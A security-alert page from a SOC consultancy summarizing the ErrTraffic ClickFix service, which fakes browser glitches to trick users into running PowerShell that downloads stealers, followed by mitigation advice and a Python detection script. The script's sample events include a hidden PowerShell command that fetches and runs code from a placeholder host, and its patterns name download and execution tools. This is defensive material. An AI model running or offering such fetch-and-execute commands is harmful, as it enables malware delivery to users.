


Perceptive Security
SOC/SIEM Consultancy

New ErrTraffic service enables ClickFix attacks via fake browser glitches
Published:
30 December 2025 at 21:08:28
Alert date:
30 December 2025 at 22:02:15
Source:
bleepingcomputer.com
Web Technologies, Ransomware & Malware, Data Breach & Exfiltration
A new cybercrime-as-a-service tool called ErrTraffic has emerged, enabling threat actors to automate ClickFix attacks. The service generates fake browser glitches on compromised websites to deceive users into downloading malicious payloads or following harmful instructions. This represents an evolution in social engineering attacks, making them more accessible to cybercriminals through automation. The tool poses significant risks as it can be used to distribute malware, steal credentials, or compromise systems through user deception. The service demonstrates the continued professionalization of cybercrime operations.
Technical details
ErrTraffic is a self-hosted traffic distribution system (TDS) that automates ClickFix attacks by generating fake browser glitches on compromised websites. The platform costs $800 as a one-time purchase and claims conversion rates of up to 60%. It uses geolocation and OS fingerprinting to modify the page DOM and display visual glitches such as corrupted text, fonts replaced with symbols, fake Chrome updates, or missing system font errors. When victims follow the instructions to 'fix' the glitch, JavaScript code places a PowerShell command on the clipboard that downloads malware payloads. The platform delivers OS-specific malware: the Lumma and Vidar info-stealers on Windows, the Cerberus trojan on Android, AMOS (Atomic Stealer) on macOS, and backdoors on Linux. It excludes CIS countries from targeting, suggesting Russian origins.
Mitigation steps:
Monitor for suspicious website behavior including corrupted text displays, fake browser update prompts, missing font error messages, and unexpected clipboard modifications. Be cautious of websites that suddenly appear broken or display technical error messages requesting you to run commands or download updates. Implement security controls to detect PowerShell command execution from clipboard content and monitor for connections to known malware distribution sites.
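One way to implement the PowerShell-execution check from the mitigation steps, as an added example (not code from the original alert): it triages process-creation events for PowerShell started by explorer.exe whose command line carries download, in-memory execution, hidden-window or encoded-command indicators. The Sysmon-style field names, the explorer.exe parent heuristic and the sample events are assumptions constructed for illustration.

```python
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://cdn.example.invalid/fix)"'},
    {"Image": PS, "ParentImage": r"C:\Program Files\Mgmt\agent.exe",
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumption: a command pasted by the user is launched from the interactive shell.
INTERACTIVE_PARENTS = {"explorer.exe"}
INDICATORS = {
    "download": re.compile(r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
                           r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w\w*\s+(hidden|hid|h|1)\b", re.I),
    "encoded": re.compile(r"(?<!\S)-e(c|n\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(event):
    """Return the indicator names that fire, or [] when the event is not a candidate."""
    if basename(event.get("Image", "")) not in POWERSHELL:
        return []
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def triage(events):
    """Return (event, hits) pairs for events worth an analyst's attention."""
    return [(e, hits) for e in events if (hits := clickfix_indicators(e))]

if __name__ == "__main__":
    for event, hits in triage(SAMPLE_EVENTS):
        print(", ".join(hits), "|", event["CommandLine"])
```

A bare interactive PowerShell launch and a script run by a management agent are both ignored, so the rule only fires when the interactive parent and a suspicious command line coincide.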
Affected products:
Windows
Android
macOS
Linux
Google Chrome
Web browsers
Related links:
https://www.bleepingcomputer.com/news/security/fake-google-chrome-errors-trick-you-into-running-malicious-powershell-scripts/
https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/
This article was created with the assistance of AI technology by Perceptive.
